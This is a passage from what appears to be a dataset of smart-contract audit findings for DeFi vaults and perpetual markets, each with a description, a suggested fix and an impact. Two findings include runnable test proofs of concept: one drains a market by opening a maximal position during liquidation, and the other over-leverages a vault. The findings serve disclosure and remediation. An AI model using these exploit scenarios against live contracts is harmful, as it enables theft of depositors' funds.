the vault but the account would still be forced to be holding a sizeable position overall due to the minium borrow size.\\nin `reinvestReward()`, not this limit\\n```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n\\nFrom the above code, we know that `reinvestReward()` will increase `totalPoolClaim`, but will not increase `totalVaultSharesGlobal`.\\nThis will cause problems in the following scenarios:\\nThe current vault has deposits.\\n`Rewards` have been generated, but `reinvestReward()` has not been executed.\\nThe `bot` submitted the `reinvestReward()` transaction. but step 4 execute first\\nThe users took away all the deposits `totalPoolClaim = 0`, `totalVaultSharesGlobal=0`.\\nAt this time `reinvestReward()` is executed, then `totalPoolClaim > 0`, `totalVaultSharesGlobal=0`.\\nOther users' deposits will fail later\\nIt is recommended that `reinvestReward()` add a judgment of `totalVaultSharesGlobal>0`.\\nNote: If there is a malicious REWARD_REINVESTMENT_ROLE, it can provoke this issue by donating reward token and triggering reinvestReward() before the first depositor appears.ч```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n// Add the line below\\n require(state.totalVaultSharesGlobal > 0 ,\"invalid shares\");\\n state.totalPoolClaim // Add the line below\\n= poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\nчreinvestReward() generates dust totalPoolClaim causing vault abnormalч```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n -ETH can be sold during reinvestmentчmediumчThe existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.\\nMultiple instances of this issue were found:\\nInstance 1 - Curve's Implementation\\nThe `_isInvalidRewardToken` function attempts to prevent the callers from selling away ETH during reinvestment.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the code at Line 67 above will not achieve the intended outcome as `Deployments.ALT_ETH_ADDRESS` is not a valid token address in the first place.\\n```\\naddress internal constant ALT_ETH_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n```\\n\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)) as shown in the TradingUtils's source code, not the `Deployments.ALT_ETH_ADDRESS`.\\n```\\nFile: TradingUtils.sol\\n function _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n ) private {\\n uint256 preTradeBalance;\\n \\n if (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS || _needsToUnwrapExcessWETH(trade, spender)) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n }\\n```\\n\\nAs a result, the caller (bot) of the reinvestment function could still sell off the ETH from the vault, bypassing the requirement.\\nInstance 2 - Balancer's Implementation\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)), as mentioned earlier. However, the `AuraStakingMixin._isInvalidRewardToken` function only blocks `Deployments.WETH` but not `Deployments.ETH`, thus allowing the caller (bot) of the reinvestment function, could still sell off the ETH from the vault, bypassing the requirement.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\nчTo ensure that ETH cannot be sold off during reinvestment, consider the following changes:\\nCurve\\n```\\nFile: ConvexStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n// Add the line below\\n token == Deployments.ETH ||\\n// Add the line below\\n token == Deployments.WETH ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n}\\n```\\n\\nBalancer\\n```\\nFile: AuraStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n// Add the line below\\n token == address(Deployments.ETH) \\n token == address(Deployments.WETH)\\n );\\n}\\n```\\nчThe existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.ч```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n -Leverage Vault on sidechains that support Curve V2 pools is brokenчmediumчNo users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools, leading to the core contract functionality of a vault being broken and a loss of revenue for the protocol.\\nFollowing are examples of some Curve V2 pools in Arbitum:\\nThe code from Line 64 to Line 71 is only executed if the contract resides on Ethereum. As a result, for Arbitrum and Optimism sidechains, the `IS_CURVE_V2` variable is always false.\\n```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n\\nAs a result, code within the `_joinPoolAndStake` function will always call the Curve V1's `add_liquidity` function that does not define the `use_eth` parameter.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _joinPoolAndStake(\\n..SNIP..\\n // Slightly different method signatures in v1 and v2\\n if (IS_CURVE_V2) {\\n lpTokens = ICurve2TokenPoolV2(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim, 0 < msgValue // use_eth = true if msgValue > 0\\n );\\n } else {\\n lpTokens = ICurve2TokenPoolV1(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim\\n );\\n }\\n```\\n\\nIf the `use_eth` parameter is not defined, it will default to `False`. As a result, the Curve pool expects the caller to transfer over the WETH to the pool and the pool will call `WETH.withdraw` to unwrap the WETH to Native ETH as shown in the code below.\\nHowever, Notional's leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will explicitly convert the address to either the `Deployments.ALT_ETH_ADDRESS` (0xEeeee) or `Deployments.ETH_ADDRESS` (address(0)) during deployment and initialization.\\nThe implementation of the above `_joinPoolAndStake` function will forward Native ETH to the Curve Pool, while the pool expects the vault to transfer in WETH. As a result, a revert will occur since the pool did not receive the WETH it required during the unwrap process.\\n```\\ndef add_liquidity(\\n amounts: uint256[N_COINS],\\n min_mint_amount: uint256,\\n use_eth: bool = False,\\n receiver: address = msg.sender\\n) -> uint256:\\n \"\"\"\\n @notice Adds liquidity into the pool.\\n @param amounts Amounts of each coin to add.\\n @param min_mint_amount Minimum amount of LP to mint.\\n @param use_eth True if native token is being added to the pool.\\n @param receiver Address to send the LP tokens to. Default is msg.sender\\n @return uint256 Amount of LP tokens received by the `receiver\\n \"\"\"\\n..SNIP..\\n # --------------------- Get prices, balances -----------------------------\\n..SNIP..\\n # -------------------------------------- Update balances and calculate xp.\\n..SNIP// rest of code\\n # ---------------- transferFrom token into the pool ----------------------\\n\\n for i in range(N_COINS):\\n\\n if amounts[i] > 0:\\n\\n if coins[i] == WETH20:\\n\\n self._transfer_in(\\n coins[i],\\n amounts[i],\\n 0, # <-----------------------------------\\n msg.value, # | No callbacks\\n empty(address), # <----------------------| for\\n empty(bytes32), # <----------------------| add_liquidity.\\n msg.sender, # |\\n empty(address), # <-----------------------\\n use_eth\\n )\\n```\\n\\n```\\ndef _transfer_in(\\n..SNIP..\\n use_eth: bool\\n):\\n..SNIP..\\n @params use_eth True if the transfer is ETH, False otherwise.\\n \"\"\"\\n\\n if use_eth and _coin == WETH20:\\n assert mvalue == dx # dev: incorrect eth amount\\n else:\\n..SNIP..\\n if _coin == WETH20:\\n WETH(WETH20).withdraw(dx) # <--------- if WETH was transferred in\\n # previous step and `not use_eth`, withdraw WETH to ETH.\\n```\\nчEnsure the `IS_CURVE_V2` variable is initialized on the Arbitrum and Optimism side chains according to the Curve Pool's version.\\nIf there is a limitation on the existing approach to determining a pool is V1 or V2 on Arbitrum and Optimsim, an alternative approach might be to use the presence of a `gamma()` function as an indicator of pool typeчNo users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools. The deposit function is a core function of any vault. Thus, this issue breaks the core contract functionality of a vault.\\nIn addition, if the affected vaults cannot be used, it leads to a loss of revenue for the protocol.ч```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n -Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contractчhighчWhen a user is liquidated, there is a check to ensure that after liquidator order executes, `closable = 0`, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.\\n`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. For example:\\nLatest position = 10\\nPending position [t=200] = 0\\nPending position [t=300] = 1000\\nIn such scenario `closable = 0` (regardless of position size at t=300).\\nWhen position is liquidated (called `protected` in the code), the following requirements are enforced in _invariant():\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n\\nThe requirements for liquidated positions are:\\nclosable = 0, user position collateral is below maintenance, liquidator withdraws no more than liquidation fee\\nmarket oracle price is not stale\\nfor closed market - order doesn't increase position\\nmaker position doesn't exceed maker limit\\norder and position are single-sided\\nAll the other invariants are skipped for liquidation, including checks for long or short position size and collateral.\\nAs shown in the example above, it's possible for the user to have `closable = 0` while having the new (current) position size of any amount, which makes it possible to succesfully liquidate user while increasing the position size (long or short) to any amount (up to max `2^62-1` enforced when storing position size values).\\nScenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position `long = 10` with collateral = min margin ($350) T=120: Oracle version T=100 is commited, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling `update(0,0,0,0,false)` T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is commited, so his close request is still pending). Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: `update(0,2^62-1,0,0,true)` Liquidation succeeds, because user has latest `long = 10`, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). `closable = 0`.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('liquidate with huge open position', async () => {\\nconst positionMaker = parse6decimal('20.000')\\nconst positionLong = parse6decimal('10.000')\\nconst collateral = parse6decimal('1000')\\nconst collateral2 = parse6decimal('350')\\nconst maxPosition = parse6decimal('4611686018427') // 2^62-1\\n\\nconst oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\noracle.status.returns([oracleVersion, TIMESTAMP + 100])\\noracle.request.returns()\\n\\n// maker\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\nawait market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n// user opens long=10\\ndsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)\\nawait market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)\\n\\nconst oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\noracle.status.returns([oracleVersion2, TIMESTAMP + 200])\\noracle.request.returns()\\n\\n// price moves against user, so he's at the edge of liquidation and tries to close\\n// position: latest=10, pending [t=200] = 0 (closable = 0)\\nawait market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\nconst oracleVersion3 = {\\n price: parse6decimal('92'),\\n timestamp: TIMESTAMP + 190,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\noracle.status.returns([oracleVersion3, TIMESTAMP + 300])\\noracle.request.returns()\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(\"Before liquidation. Latest= \" + posLatest.long + \" current = \" + posCurrent.long);\\n\\n// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited\\n// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300\\n// liquidate. User pending positions:\\n// latest = 10\\n// pending [t=200] = 0\\n// current(liquidated) [t=300] = max possible position (2^62-1)\\nawait market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(\"After liquidation. Latest= \" + posLatest.long + \" current = \" + posCurrent.long);\\n\\n})\\n```\\nчWhen liquidating, order must decrease position:\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n- collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n+ collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder))) ||\\n+ newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)\\n)) revert MarketInvalidProtectionError();\\n```\\nчMalicious liquidator can liquidate users while increasing their position to any value including max possible 2^62-1 ignoring any collateral and position size checks. This is possible on its own, but liquidator can also craft such situation with very high probability. As a result of this action, all users will lose all their funds deposited into Market. For example, fee paid (and accured by makers) from max possible position will exceed total Market collateral balance so that the first maker will be able to withdraw all Market balance, minimal price change will create huge profit for the user, exceeding Market balance (if fee = 0) etc.ч```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n -Vault leverage can be increased to any value up to min margin requirement due to incorrect `maxRedeem` calculations with closable and `LEVERAGE_BUFFER`чhighчWhen redeeming from the vault, maximum amount allowed to be redeemed is limited by collateral required to keep the minimum vault position size which will remain open due to different factors, including `closable` value, which is a limitation on how much position can be closed given current pending positions. However, when calclulating max redeemable amount, `closable` value is multiplied by `LEVERAGE_BUFFER` value (currently 1.2):\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n\\nThe intention seems to be to allow to withdraw a bit more collateral so that leverage can increase at max by LEVERAGE_BUFFER. However, the math is totally wrong here, for example:\\nCurrent position = 12, `closable = 10`\\nMax amount allowed to be redeemed is 12 (100% of shares)\\nHowever, when all shares are withdrawn, `closable = 10` prevents full position closure, so position will remain at 12-10 = 2\\nOnce settled, user can claim all vault collateral while vault still has position of size 2 open. Claiming all collateral will revert due to this line in allocate:\\n```\\n_locals.marketCollateral = strategy.marketContexts[marketId].margin\\n .add(collateral.sub(_locals.totalMargin).muldiv(registrations[marketId].weight, _locals.totalWeight));\\n```\\n\\nSo the user can claim the assets only if remaining collateral is equal to or is greater than total margin of all markets. This means that user can put the vault into max leverage possible ignoring the vault leverage config (vault will have open position of such size, which will make all vault collateral equal the minimum margin requirement to open such position). This creates a big risk for vault liquidation and loss of funds for vault depositors.\\nAs seen from the example above, it's possible to put the vault at high leverage only if user redeems amount higher than `closable` allows (redeem amount in the closable..closable * LEVERAGE_BUFFER range). However, since deposits and redeems from the vault are settled later, it's impossible to directly create such situation (redeemable amount > closable). There is still a way to create such situation indirectly via maker limit limitation.\\nScenario:\\nMarket config leverage = 4. Existing deposits = $1K. Existing positions in underlying market are worth $4K\\nOpen maker position in underlying markets such that `makerLimit - currentMaker = $36K`\\nDeposit $11K to the vault (total deposits = $12K). The vault will try to open position of size = $48K (+$44K), however `makerLimit` will not allow to open full position, so the vault will only open +$36K (total position $40K)\\nWait until the deposit settles\\nClose maker position in underlying markets to free up maker limit\\nDeposit minimum amount to the vault from another user. This increases vault positions to $48K (settled = $40K, pending = $48K, `closable` = $40K)\\nRedeem $11K from the vault. This is possible, because maxRedeem is `closable/leverage*LEVERAGE_BUFFER` = `$40K/4*1.2` = `$12K`. However, the position will be limited by `closable`, so it will be reduced only by $40K (set to $8K).\\nWait until redeem settles\\nClaim $11K from the vault. This leaves the vault with the latest position = $8K, but only with $1K of original deposit, meaning vault leverage is now 8 - twice the value specified by config (4).\\nThis scenario will keep high vault leverage only for a short time until next oracle version, because `claim` will reduce position back to $4K, however this position reduction can also be avoided, for example, by opening/closing positions to make `long-short = maker` or `short-long = maker` in the underlying market(s), thus disallowing the vault to reduce its maker position and keeping the high leverage.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('increase vault leverage', async () => {\\n console.log(\"start\");\\n\\n async function setOracle(latestTime: BigNumber, currentTime: BigNumber) {\\n await setOracleEth(latestTime, currentTime)\\n await setOracleBtc(latestTime, currentTime)\\n }\\n\\n async function setOracleEth(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await oracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n oracle.status.returns([newVersion, currentTime])\\n oracle.request.whenCalledWith(user.address).returns()\\n oracle.latest.returns(newVersion)\\n oracle.current.returns(currentTime)\\n oracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function setOracleBtc(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await btcOracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n btcOracle.status.returns([newVersion, currentTime])\\n btcOracle.request.whenCalledWith(user.address).returns()\\n btcOracle.latest.returns(newVersion)\\n btcOracle.current.returns(currentTime)\\n btcOracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function logLeverage() {\\n // vault collateral\\n var vaultCollateralEth = (await market.locals(vault.address)).collateral\\n var vaultCollateralBtc = (await btcMarket.locals(vault.address)).collateral\\n var vaultCollateral = vaultCollateralEth.add(vaultCollateralBtc)\\n\\n // vault position\\n var vaultPosEth = (await market.positions(vault.address)).maker;\\n var ethPrice = (await oracle.latest()).price;\\n var vaultPosEthUsd = vaultPosEth.mul(ethPrice);\\n var vaultPosBtc = (await btcMarket.positions(vault.address)).maker;\\n var btcPrice = (await btcOracle.latest()).price;\\n var vaultPosBtcUsd = vaultPosBtc.mul(btcPrice);\\n var vaultPos = vaultPosEthUsd.add(vaultPosBtcUsd);\\n var leverage = vaultPos.div(vaultCollateral);\\n console.log(\"Vault collateral = \" + vaultCollateral.div(1e6) + \" pos = \" + vaultPos.div(1e12) + \" leverage = \" + leverage);\\n }\\n\\n await setOracle(STARTING_TIMESTAMP.add(3600), STARTING_TIMESTAMP.add(3700))\\n await vault.settle(user.address);\\n\\n // put markets at the (limit - 5000) each\\n var makerLimit = (await market.riskParameter()).makerLimit;\\n var makerCurrent = (await market.position()).maker;\\n var maker = makerLimit;\\n var ethPrice = (await oracle.latest()).price;\\n var availUsd = parse6decimal('32000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(ethPrice);\\n maker = maker.sub(availToken);\\n var makerBefore = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(\"ETH Limit = \" + makerLimit + \" CurrentGlobal = \" + makerCurrent + \" CurrentUser = \" + makerBefore + \" price = \" + ethPrice + \" availToken = \" + availToken + \" maker = \" + maker);\\n for (var i = 0; i < 5; i++)\\n await fundWallet(asset, user);\\n await market.connect(user).update(user.address, maker, 0, 0, parse6decimal('1000000'), false)\\n\\n var makerLimit = (await btcMarket.riskParameter()).makerLimit;\\n var makerCurrent = (await btcMarket.position()).maker;\\n var maker = makerLimit;\\n var btcPrice = (await btcOracle.latest()).price;\\n var availUsd = parse6decimal('8000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(btcPrice);\\n maker = maker.sub(availToken);\\n var makerBeforeBtc = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(\"BTC Limit = \" + makerLimit + \" CurrentGlobal = \" + makerCurrent + \" CurrentUser = \" + makerBeforeBtc + \" price = \" + btcPrice + \" availToken = \" + availToken + \" maker = \" + maker);\\n for (var i = 0; i < 10; i++)\\n await fundWallet(asset, btcUser1);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, maker, 0, 0, parse6decimal('2000000'), false)\\n\\n console.log(\"market updated\");\\n\\n var deposit = parse6decimal('12000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await setOracle(STARTING_TIMESTAMP.add(3700), STARTING_TIMESTAMP.add(3800))\\n await vault.settle(user.address)\\n\\n await logLeverage();\\n\\n // withdraw the blocking amount\\n console.log(\"reduce maker blocking position to allow vault maker increase\")\\n await market.connect(user).update(user.address, makerBefore, 0, 0, 0, false);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, makerBeforeBtc, 0, 0, 0, false);\\n\\n await setOracle(STARTING_TIMESTAMP.add(3800), STARTING_TIMESTAMP.add(3900))\\n\\n // refresh vault to increase position size since it's not held now\\n var deposit = parse6decimal('10')\\n console.log(\"Deposit small amount to increase position\")\\n await vault.connect(user2).update(user2.address, deposit, 0, 0)\\n\\n // now redeem 11000 (which is allowed, but market position will be 2000 due to closable)\\n var redeem = parse6decimal('11500')\\n console.log(\"Redeeming 11500\")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n // settle all changes\\n await setOracle(STARTING_TIMESTAMP.add(3900), STARTING_TIMESTAMP.add(4000))\\n await vault.settle(user.address)\\n await logLeverage();\\n\\n // claim those assets we've withdrawn\\n var claim = parse6decimal('11100')\\n console.log(\"Claiming 11100\")\\n await vault.connect(user).update(user.address, 0, 0, claim);\\n\\n await logLeverage();\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nETH Limit = 1000000000 CurrentGlobal = 200000000 CurrentUser = 200000000 price = 2620237388 availToken = 12212633 maker = 987787367\\nBTC Limit = 100000000 CurrentGlobal = 20000000 CurrentUser = 20000000 price = 38838362695 availToken = 205981 maker = 99794019\\nmarket updated\\nVault collateral = 12000 pos = 39999 leverage = 3333330\\nreduce maker blocking position to allow vault maker increase\\nDeposit small amount to increase position\\nRedeeming 11500\\nVault collateral = 12010 pos = 8040 leverage = 669444\\nClaiming 11100\\nVault collateral = 910 pos = 8040 leverage = 8835153\\n```\\nчThe formula to allow LEVERAGE_BUFFER should apply it to final position size, not to delta position size (maxRedeem returns delta to subtract from current position). Currently redeem amount it limited by: `closable * LEVERAGE_BUFFER`. Once subtracted from the current position size, we obtain:\\n`maxRedeem = closable * LEVERAGE_BUFFER / leverage`\\n`newPosition = currentPosition - closable`\\n`newCollateral = (currentPosition - closable * 